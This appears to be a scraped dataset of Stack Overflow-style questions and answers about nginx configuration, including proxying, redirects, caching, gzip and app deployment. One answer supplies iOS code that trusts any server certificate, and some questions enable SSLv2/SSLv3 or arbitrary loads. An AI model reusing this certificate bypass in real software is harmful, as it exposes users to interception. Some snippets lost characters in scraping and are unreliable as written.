} | I'm trying to do a basic NGINX reverse proxy by subdomian, to localhost/folder and am stumped getting it to rewrite my assets+links.Myhttp://localhost:8080/myapp/works like a charm, but via NGINX+subdomain it fails on the subfolder assets.I believe I'm stumped on the 'rewrite' clause for NGINX.How can I rewrite the HTML going to the client browser to drop the /myapp/ context?server {
listen 443 ssl;
server_name app1.domain.com;
location / {
rewrite ^/myapp/(.*) /$1 break; # this line seems to do nothing
proxy_pass http://localhost:8080/myapp/;
}
}I'm expecting my resultant HTML (viahttps://app1.domain.com) to be rewritten without the subfolder /myapp/, so when assets are requested they can be found instead of a 404 againsthttps://app1.domain.com/myapp/assets/. It should just behttps://app1.domain.com/assets/(which if I manually go there they work)--thanks. | NGINX proxy_pass rewrite asset uri |
I solved this issue moving my application to AWS and saving the files in S3! | I have clients that have the browser open all day so after I make a deployment they see the application broken and they need to reload the page to fix it.The server failed to load a chunk file because of the NO-CACHE hash added by @angular/cli production build.Error:error: Uncaught (in promise): Error: Loading chunk 11 failed.I want to reload the page after a deployment.These are my tools:I have access to my NGINX configuration.I have access to Jenkins (Blue Ocean)I have implemented HttpClient Interceptors in the project. | Angular - Load Production chunk files failed after deploy |
location ~* ^/matches any URI that begins with/- which isany URIthat hasn't already matched an earlier regular expression location rule.To match only the URI/and nothing else, use the$operator:location ~* ^/$ { ... }Or even better, and exact match location block:location = / { ... }Seethis documentfor more. | I want redirecthttps://dev.abc.com/ to https://uat.abc.com/
https://dev.abc.com/first to https://uat.abc.com/first
https://dev.abc.com/second to https://uat.abc.com/
https://dev.abc.com/third/ to https://dev.abc.com/third/ (Point the same)I have tried with following config and achieved first three. But last one also redirecting to uat. Can anyone help me in this situation.server {
listen 80;
server_name dev.abc.com;
root /var/www/
location ~* ^/first{
return 301 https://uat.abc.com$request_uri;
}
location ~* ^/second{
return 301 https://uat.abc.com;
}
location ~* ^/{
return 301 https://uat.abc.com$request_uri;
}Can anyone help me on this configuration? | Rewrite all url to another url except one in nginx |
You need to do it like thislocation /foo {
if ($args ~* "(.*)(example\.com)(.*)") {
set $args "$1example.net$3";
return 301 $scheme://$host$uri$is_args$args;
}
} | folks!We have following http request:http://example.com/foo?redirect_uri=http%3A%2F%2Fexample.com%2FbarWe want to replaceredirect_urifrom "example.com" to "example.net".How to do it?Thanks | How to write nginx rewrite rule for replacing query param in query string |
PythonAnywhere dev here. Unfortunately you can't change the nginx settings on our system -- but the system-default settings are actually pretty much what you'd want. If you're using the "Static files" table on the "Web" tab to specify where they are, then:When a browser requests a static file for the first time, it's sent back with a header saying when it was last modified (based on the file timestamp).When the browser requests the static file after that, and it has a copy in its cache, it will normally send a "if-modified-since" header with the value of the last-modified header it got the first time around.The server will check the file timestamp, and if the file hasn't changed, it will send back an HTTP 304 ("not modified") response with no content, so the browser knows it can just used the cached one. If the file has changed, then of course it sends back a normal 200 response with the new content and an updated last-modified timestamp for the browser to cache. | I am trying to "leverage browser caching" in order to increase site speed. The webapp is hosted on pythonanywhere and I guess I need to configure the nginx.conf file to include:location ~* \.(css|js|gif|jpe?g|png)$ {
expires 168h;
add_header Pragma public;
add_header Cache-Control "public, must-revalidate, proxy-revalidate";
}(from here:how to Leverage browser caching in django)However I can't find the conf file anywhere. It is not in /etc/nginx, /usr/local/etc /usr/etc ...Can this be done on pythonanywhere ? | Configure nginx server on Pythonanywhere |
Therewritestatement is an implicitrewrite...last, which means that the final URI/119.imgis not processed by thislocationblock. By the time the response headers are being calculated,nginxis in a differentlocationblock.You could try processing the final URI from within the same location block, by using arewrite...breakstatement. Seethis documentfor details.location = /my.img {
root /path/to/file;
rewrite ^ /119.img break;
add_header x-amz-meta-sig 1234567890abcdef;
}If thelocationis intended to match only one URI, use the=format. Seethis documentfor details.Note also that the presence of anadd_headerstatement in thislocationblock, will mean that the outer statement will no longer be inherited. Seethis documentfor details.
: | I try to add a response header to only one location path served and have an nginx config looks likeserver {
...
add_header x-test test;
location /my.img {
rewrite ^/my.img$ /119.img;
add_header x-amz-meta-sig 1234567890abcdef;
}
}But only the top-level header (x-test) is effective, the one within the location directive does not show up as shown in$ curl -v -o /tmp/test.img 'https://www.example.com/my.img'
< HTTP/1.1 200 OK
< Server: nginx/1.9.3 (Ubuntu)
< Date: Sun, 14 May 2017 23:58:08 GMT
< Content-Type: application/octet-stream
< Content-Length: 251656
< Last-Modified: Fri, 03 Mar 2017 04:57:47 GMT
< Connection: keep-alive
< ETag: "58b8f7cb-3d708"
< x-test: test
< Accept-Ranges: bytes
<
{ [16104 bytes data]How to send back a custom headrr only for the specific file served. | add header to response in nginx location directive |
You need to use:nginx -g "daemon off;", with the option quoted. | I'm currently trying to execute a bash script inside my Nginx container and then keeping it alive of course.So, my idea was to do what I need to in the bash script and as the last command, the command found with adocker-compose ps. But the container keeps shutting down. Here is a summary of what I currently haveThe DockerfileFROM nginx:latest
COPY ./run.sh /root/run.sh
RUN ["chmod", "+x", "/root/run.sh"]
CMD ["/root/run.sh"]run.sh#!/bin/bash
nginx -g daemon off;Am I missing something? | Keep an Nginx alive after a bash script |
Place thereturnstatement inside alocationblock:For example:server {
listen 8080;
server_name my_example.com;
location /.well-known/acme-challenge/ {
root /var/www/encrypt;
}
location / {
return 301 https://$server_name$request_uri;
}
}Also, simplified your otherlocationblock. | I want to be able, if the request tries to access/.well-known/acme-challenge/to serve the matching file if found.If the request is something else, I want to redirect it tohttps://server {
listen 8080;
server_name my_example.com;
location /.well-known/acme-challenge/ {
alias /var/www/encrypt/.well-known/acme-challenge/;
try_files $uri =404;
}
return 301 https://$server_name$request_uri;
}Problem is when accessing tomy_example.com/.well-known/acme-challenge/12345which exist in alias path, i'mstillredirected to https:// and the browser doesn't download the file.How can I just serve the file and not apply the redirection in this case ?Thanks | Nginx location alias + redirection |
Simply install necessary extensions and restart fpm process:sudo apt-get install php-mysqlnd php-mysqli
sudo /etc/init.d/php7.0-fpm restart | How can I fix this? im trying to do acleaninstall of wordpresslateston ubuntu 16 runningnginxforPhp7When i access :http://blog.mysite.com/wordpress/I get:Your PHP installation appears to be missing the MySQL extension which
is required by WordPress.How can i resolve this? | Php7 Installation of wordpress on nginx throwing PHP installation missing MySQL extension which is required by WordPress |
This can be done easily with thengx-perlorngx-luamodules. But if you don't have them installed or are just looking for an old-school solution, there is a way to solve the problem with the good oldrewritemagic and regular expressions:server {
listen 80;
server_name ~^(prefix(?[0-9]+)).domain.com;
location / {
# Since it's always wise to validate the input, let's
# make sure there's no more than two digits in the variable.
if ($variable ~ ".{3}") { return 400; }
# Initialize the port variable with the value.
set $custom_port 14$variable;
# Now, depending on the $variable, $custom_port can contain
# values like 1455, which is correct, or like 149, which is not.
# Nginx does not have any functions like "replace" that could be
# used on random variables. However, the rewrite directive can
# replace strings using regular expression patterns. The only
# problem is that the rewrite only works with one specific variable,
# namely, $uri.
# So the trick is to assign the $uri with the string we want to change,
# make necessary replacements and then restore the original value or
# the $uri:
if ($custom_port ~ "^.{3}$") { # If there are only 3 digits in the port
set $original_uri $uri; # Save the current value of $uri
rewrite ^ $custom_port; # Assing the $uri with the wrong port
rewrite 14(.) 140$1; # Put an extra 0 in the middle of $uri
set $custom_port $uri; # Assign the port with the correct value
rewrite ^ $original_uri; # And restore the $uri variable
}
proxy_pass http://127.0.0.1:$custom_port;
}
} | Is there anyway I can do simple math calculation for ngnix configuration file. Lets say I want to do proxy pass based on host domain. I am able to redirect host to correct port number when prefix comes with 0 to 9. However what I really want is prefix10 to port 1410. but based on my configuration right now, it will proxy to port 14010Host:http://prefix0.domain.com-> 127.0.0.1:1400http://prefix10.domain.com-> 127.0.0.1:1410http://prefix99.domain.com-> 127.0.0.1:1499server {
listen 80;
server_name ~^(prefix(?[0-9]+)).domain.com;
location / {
proxy_pass http://127.0.0.1:140$variable;
}
} | how to do simple math calculation for variable in nginx configuration file |
it is easy. if your nginx config looks like this:server {
server_name _; #catch all
...you can add to hosts file on you host machine the line127.0.0.1 myproject.devand your container will be available by urlhttp://myproject.dev:if you expose you container on 80 port, you can simply type urlhttp://myproject.dev(like the good old days). But remeber you can run only one container on 80 port at the same time. | I'm new to docker, and have recently installed a docker container/image using the phpdocker.io (php7, nginx, mysql) generator. Started it using docker-compose and it's working awesome.If I go to localhost/phpinfo.php my regular system php version loads (5.6), if I go to localhost:8080/phpinfo.php my docker php version loads (7.0) so it's working ok.My question is: There is any way to map my localhost:8080 to a regular domain name like I normally do with my regular localhost projects? Withouth having to use localhost:8080 i.e.: myproject.devNot sure if this is specifically docker related or not. | Map docker container to regular dev domain name |
Community edition of Nginx does not provide such functionality.A commercial version of Nginx provides. There ismax_connsparameter inupstream's servers:upstream my_backend {
server 127.0.0.1:11211 max_conns=32;
server 10.0.0.2:11211 max_conns=32;
}The documentation ishere | trying to use NGINX as reverse proxy,
and would like to have constant number of open connections to backend (upstream) open at all times.Is this possible with nginx (maybe haproxy..?) ??running on ubuntu if it makes any difference | is it possible for NGINX to have a pool of N open connections to backend? |
If Apache2 is running WordPress, you need to configurenginxto proxy everything. At the moment you have bothnginxand Apache2 rewriting URIs to/index.php, and becausenginxdoes it first, WordPress never sees the original URI.Start with this:server {
listen 80;
server_name testblog.com;
location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header Host $host;
proxy_pass http://127.0.0.1:8182;
}
}And if you decide to allow some of the static URIs to be served bynginxfine. But you can't letnginxmap URIs to/index.phpbecause that will not work. | I have just installed wordpress on ubuntu 14.04 LTS. Nginx acts as reverse proxy for apache2.wp-admin is working fine, but I am unable to open the homepage.Nginx Server Code:server {
listen 80;
root /var/www/html/testblog;
index index.php index.html index.htm;
server_name testblog.com;
location / {
# try_files $uri $uri/ =404;
try_files $uri $uri/ /index.php?q=$uri&$args;
}
error_page 404 /404.html;
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root /usr/share/nginx/html;
}
location ~ \.php$ {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $remote_addr;
proxy_set_header Host $host;
proxy_pass http://127.0.0.1:8182;
}
location ~ /\.ht {
deny all;
}
}Apache Virtual Host Conf:
ServerName testblog.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/testblog
ErrorLog ${APACHE_LOG_DIR}/errortest.log
CustomLog ${APACHE_LOG_DIR}/accesstest.log combined
My /etc/hosts:127.0.0.1 localhost
127.0.0.1 ubuntu
127.0.1.1 testblog.comI have all the wp files in the folder /var/www/html/testblog/.testblog.com/wp-admin: working fine.testblog.com: giving too many redirects.Here is my settings page:I guess my settings are correct. I have tried defining WP_HOME and WP_SITEURL in wp-config.php, but no luck.My /var/www/html/testblog/.htaccess:# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPresstestblog.com/wp-admin: working.testblog.com: giving too many redirects errorAny help is highly appreciated.Edit:I have already disabled all the plugins. | too many redirects for wordpress on nginx with apache2 |
There is no definitive list of the file typesyouwould want to gzip. Any file type readable as plain text (i.e. non-binary files) are able to be gzipped, and so a "definitive" list would be massive. Therefore, it ultimately depends on which file types you are actually serving, which you can check for any given file via the HTTPContent-Typeheader.If you want to be doubly sure you are covering all possible MIME types for a particular extension (which I think is reasonable), Looking atthis SO post,this text filecontains a pretty darn exhaustive list.It's important to note that some binary file types like.pngand.pdf(even.woff) incorporate compression into the format itself and as such should not be gzipped (because doing so could produce a compressed file larger than the original). My rule of thumb is: if my code editor can't read the file as UTF-8 text, gzipping the file would not be wise (or at least it wouldn't be very efficient).FWIW, I typically gzip the following formats (in my Apache.htaccess) on my site:
AddOutputFilterByType DEFLATE text/html text/xml text/css text/javascript application/javascript application/x-javascript application/json application/xml image/svg+xml
| In several nginx tutorial sites explaining "how to set up gzip compression," I've seen this list of MIME types repeated:gzip_types text/plain text/html text/css application/x-javascript text/xml application/xml application/xml+rss text/javascript;However, I immediately found that this list did not result in compression being enabled for JavaScript in Chromium. I had to addapplication/javascriptto the list. Which leads me to believe this list is outdated.Is there a definitive list of all the content types I would want to gzip? | nginx which content types to enable compression for |
Try this:map $upstream_response_time $temprt {
default $upstream_response_time;
"" 0;
}$upstream_response_timeeither a number or unset. Nginx logs unset variables as dash (-), butmaptreats them as empty strings. | I have my NGINX logs formated as JSON:log_format le_json '{ "@timestamp": "$time_iso8601", '
'"remote_addr": "$remote_addr", '
'"remote_user": "$remote_user", '
'"body_bytes_sent": "$body_bytes_sent", '
'"status": $status, '
'"request": "$request", '
'"request_method": "$request_method", '
'"response_time": $upstream_response_time, '
'"http_referrer": "$http_referer", '
'"http_user_agent": "$http_user_agent" }';My log gets picked up by filebeat and sent to Logstash that have the following config:input {
beats {
port => 5044
codec => "json"
}
}
filter {
geoip {
database => "C:/GeoLiteCity.dat"
source => "[remote_addr]"
}
}
output {
elasticsearch {
template => "C:/ELK/logstash-2.2.2/templates/elasticsearch-template.json"
template_overwrite => true
hosts => ["127.0.0.1"]
index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}"
document_type => "%{[@metadata][type]}"
}
}The problem i'm having is $upstream_response_time. When there is no response time NGINX puts an '-' on this post. As you can see i don't put "" around $upstream_response_time because i want it as a number so i can perform calculations with this in Kibana and display. When '-' is sent i get a jsonparsefailure in Logstash because it is not a number.I would like to set all the '-' to 0. What would be the best way to do this?
I've had no success with trying to filter it in nginx-config. I think it needs to be done prior to getting shipped to Logstash because that's where the parsefailure occurs.Any ideas? | NGINX log filter $upstream_response_time JSON ELK "-" parsefailure |
I figured out the issue. It has nothing to do with App Transport Security. I had to make sure that iOS trusts the certificate since it's not from a trusted authority.The old school way of doing this by overriding NSURLRequest.allowsAnyHTTPSCertificateForHost doesn't work.Since i'm using NSURLSession you have to do it with this:- (id) init {
self = [super init];
NSURLSessionConfiguration * config = [NSURLSessionConfiguration defaultSessionConfiguration];
self.session = [NSURLSession sessionWithConfiguration:config delegate:self delegateQueue:[NSOperationQueue mainQueue]];
return self;
}
- (void) URLSession:(NSURLSession *)session didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential * _Nullable))completionHandler {
completionHandler(NSURLSessionAuthChallengeUseCredential,[NSURLCredential credentialForTrust:challenge.protectionSpace.serverTrust]);
} | I've spent a while trying to get this working. I have an API that I'm connecting to that i'm trying to switch to SSL with self signed certificates. I have control on the server and app.I generated a self signed cert according to this:https://kyup.com/tutorials/create-ssl-certificate-nginx/sudo openssl genrsa -des3 -out ssl.key 2048
sudo openssl req -new -key ssl.key -out ssl.csr
sudo cp ssl.key ssl.key.orig & sudo openssl rsa -in ssl.key.orig -out ssl.key
sudo openssl x509 -req -days 365 -in ssl.csr -signkey ssl.key -out ssl.crtI've tried some config options on the server (NGINX)ssl on;
ssl_certificate /etc/nginx/ssl/ssl.crt;
ssl_certificate_key /etc/nginx/ssl/ssl.key;
ssl_session_timeout 5m;
ssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers HIGH:!aNULL:!MD5;
#ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS";
ssl_prefer_server_ciphers on;And on the client side I've tried some different options with ATS:NSAppTransportSecurity
NSAllowsArbitraryLoads
andNSAppTransportSecurity
NSAllowsArbitraryLoads
NSExceptionDomains
test.example.com (NOT REALLY MY DOMAIN)
NSExceptionAllowsInsecureHTTPLoads
andNSAppTransportSecurity
NSAllowsArbitraryLoads
NSExceptionDomains
test.example.com (NOT REALLY MY DOMAIN)
NSExceptionAllowsInsecureHTTPLoads
NSExceptionRequiresForwardSecrecy
NSExceptionMinimumTLSVersion
TLSv1.1
Depending on different ATS options I get errors:An SSL error has occurred and a secure connection to the server cannot be made.orNSURLSession/NSURLConnection HTTP load failed (kCFStreamErrorDomainSSL, -9813)
The certificate for this server is invalid. You might be connecting to a server that is pretending to be “MYDOMAIN” which could put your confidential information at risk.Any ideas? Anyone else struggle with self signed certs?P.S. I'm on OS X 10.11.2 Beta, Xcode 7.1.1 | ios9 self signed certificate and app transport security |
When you access app with port - you are accessing the rails server directly, not proxied by nginx, this is fine for debug, but usually is not well for production.Probably host header is not passed over by client,$hostdefaults to nginx hostTrylocation @ruby {
proxy_set_header Host $host;
proxy_pass http://sub;
}And a 'hardcode'-way:proxy_set_header Host post.subdomain.me; | I wanna to deploy my Ruby on Rails application in my local computer byNginxand RoR web servers (likeUnicorn,ThinorWEBrick).As shown below, I wanna access to my web-app bypostsubdomain:upstream sub {
server unix:/tmp/unicorn.subdomain.sock fail_timeout=0;
# server 127.0.0.1:3000;
}
server {
listen 80;
server_name post.subdomain.me;
access_log /var/www/subdomain/log/access.log;
error_log /var/www/subdomain/log/error.log;
root /var/www/subdomain;
index index.html;
location / {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_redirect off;
try_files /system/maintenance.html $uri $uri/index.html $uri.html @ruby;
}
location @ruby {
proxy_pass http://sub;
}
}Everything is working fine and when I typepost.subdomain.meI can see my RoR app.Problem:When I usepost.subdomain.meurl I can't access to my subdomain (request.subdomainreturns empty andrequest.hostreturnssubdomaininstaed ofsubdomain.me). But when I usepost.subdomain.me:3000every things work perfect (I lost half of my hairs to realize that). Why and How can I resolve it? | Why I can't access to subdomain through nginx proxy pass? |
The answer is:uwsgi_file__Where the filepath has underscores for the/s and possibly other substitutions. So when the path to the script that is running is/opt/www/example.com/www/blog.pythe__name__will beuwsgi_file__opt_www_example_com_www_blogI did have to hack around on prod, but I think I got away with it. | What is the value of__name__in this example when running under uwsgi?if __name__ == '__main__':
from livereload import Server
server = Server(app.wsgi_app)
server.serve()I just want to ensure thisdoesn'trun when I push it to a production server using uwsgi under Nginx. | What __name__ string does uwsgi use? |
The most simple way to handle the load is indeed to use a load balancer to forward the requests to different server on the same machine or on remote machines.If you would to setup the servers only on one machine, usepm2, it will take care of the load balancing and keeping your server instances alive.Be awarethat running on one machine doesn't give you high availability and in case of a random shutdown your service will be down.I would advise running the server on multiple one-core machines than on one multiple-core machine.
In order to do so, setuppm2/foreveron each machine and another machine for running nginx for load balancing.Thisarticleshould get you started with nginx. | My node.js server will handle 50k simultaneous clients. An single node.js server isn't able to handle such amount of load. I suppose to setup 5 or 10 node.js server running on different ports. And, have a load-balancer, e.g. Nginx, listening to each node.js server. When one server reach 10k clients, route the excess coming-in connections to other node.js servers. Is this the right way to handle such load with node.js? If not, what's the best practice? | How to handle large amount of load with node.js server? |
The solution was to do vagrant halt and then vagrant ssh again. Then it printed out the 10000. Looks like simple logout and login with the user was not enough for some reason. | I have a problem with the error: PHP failed to open stream: Too many open files.I have looked on various answers here on stackoverflow, but I am unable to solve this issue. I have mainly tried to increase the limit of max. open files:I have edited /etc/security/limits.conf where I specified this:* soft nofile 10000
* hard nofile 30000After saving and logging out / rebooting the box, the command:ulimit -nStill prints out 1024. I am not sure why this has no effect and I think this is the reason I get the php error. If needed I can paste the whole file or any other configuration file. I am using PHP 5.6, nginx 1.8.0 and php-fpm.The solution which works for me now is to manually restart nginx with:service nginx restartAfter this things work again. Mainly the problem occurs when I run unit tests, behat tests or when I make a lot of requests to the web server. | PHP failed to open stream: Too many open files |
try like thisserver {
listen 80;
server_name server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location / {
root /home/user/myproject;
}
}
server {
listen 80;
server_name api.server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location / {
include proxy_params;
proxy_pass http://unix:/home/user/myproject/myproject.sock;
}
} | I have set up a server according to this tutorial:https://www.digitalocean.com/community/tutorials/how-to-set-up-django-with-postgres-nginx-and-gunicorn-on-ubuntu-14-04Everything is working a-okay, but I would like to change my NGINX set up to incorporate AngularJS for the front end. Right now I have it configured as the tutorial says and when I visit myip/ I get my Django app, and when I go to myip/static/ I get my static files. Great.What I would like to do is serve the Django API from a api.myip subdomain, and have myip/ actually point to my static (angular app) files.Any insight on how to configure NGINX to route this correctly?NGINX Config currently looks like this:server {
listen 80;
server_name server_domain_or_IP;
location = /favicon.ico { access_log off; log_not_found off; }
location /static/ {
root /home/user/myproject;
}
location / {
include proxy_params;
proxy_pass http://unix:/home/user/myproject/myproject.sock;
}
} | Django REST AngularJS NGINX Config |
First put your desired sub uri path inapplication.rbi.e.main...
config.relative_url_root = "/main"
...Inconfig.ru, add these lines.require ::File.expand_path('../config/environment', __FILE__)
map SampleApplication::Application.config.relative_url_root || "/" do
run Rails.application
endInproduction.rb, add below line.# Enable serving of images, stylesheets, and JavaScripts from an asset server
config.action_controller.asset_host = "YOUR_DOMAIN_NAME/main"
# ActionMailer Config
config.action_mailer.default_url_options = {
:host => "YOUR_DOMAIN_NAME",
:only_path => false,
:script_name => "/main"
}In nginx configuration file, add these lineslocation /main {
alias /var/deploy/sample_application/current/public;
try_files $uri @main;
}
location @main {
proxy_http_version 1.1;
chunked_transfer_encoding off;
proxy_buffering off;
proxy_cache off;
proxy_redirect off;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_pass http://puma_sample_application;
} | We have set up a production server for our rails app with Nginx and puma. We want to deploy our rails app at sub uri and on main domain we want to put wordpress for home page, pricing page etc.How we configure our rails that it able to run on sub uri which have Devise gem as authentication. Will we need to change our routes for sub uri?What will be the configuration for nginx and puma?Thanks in advance! | Deploy rails app at sub uri of a domain |
If you're trying to access this through CloudFlare's network you'd need to explicitly have web sockets enabled on your domain before they will work -- regardless of the port. As in, even if the port can pass through our network, that won't automatically mean that web sockets will be enabled or accessible on your domain.You can try contacting our support team to request an exception to see if they can enable it for your domain, but typically this is still only available at the business and enterprise levels.Disclaimer: I work at CloudFlare. | I have a website behind cloudflare. I need to enable websockets over SSL without turning off cloudflare support. I have a PRO plan and hence won't get the new websocket support. I am using Nginx to proxy a SSL connection to a web socket running on a node server. Now, I read somewhere that cloudflare could work with approvedportswould support websockets. Hence, I'm using 8443 for the Nginx port and another port for the node server. Using wscat it returns a 200 error.$ wscat -c wss://xyz.com:8443
error: Error: unexpected server response (200)I know that the websocket is expecting a 101 code. However, if I visithttps://xyz.com:8443, I can see the page displayed by the node server telling me proxy is working. Also, once I turn off cloudflare support, the websocket starts working. Any clues to get this working. I know I can create a subdomain but I'd prefer running the websocket behind cloudflare. | WebSocket over SSL: Cloudflare |
See basically, Unicorn or thin are all single threaded servers. Which in a way means they handle single requests at a time, using defering and other techniques.For a production setup you would generally run many instances of unicorn or thin ( depending on your load etc ), you would need to load balance b/w those rails application server instances, thats why you need Nginx or something similar on top. | Currently I've already read a lot tutorials teaching about Rails App deployment, almost every one of them use Nginx or other alternatives like Apache to serve static pages. Also in this QAWhy do we need nginx with thin on production setup?they said Nginx is used for load balancing.I can understand the reasons mentioned above, but I write a Rails App as a pure API backend service, the only purpose is to serve JSON formatted data for other client-side apps, no pages rendering at all. So my questions are:In my situation, do I really need Nginx just to deploy a pure API Rails App?If not, how should I deploy my app? just running it (with unicorn in production env) at background is good enough? likerails server -e production -d?I'm so curious about these two question, hope someone can explain the details or show me some good references for me, thanks in advance. | Is it necessary to use Nginx when deploy a Rails API ONLY app? |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.